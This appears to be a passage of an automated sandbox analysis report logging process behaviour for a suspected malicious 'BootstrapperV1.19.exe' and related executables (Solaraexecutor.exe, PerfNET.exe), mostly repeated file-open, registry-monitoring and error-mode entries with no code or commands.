Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
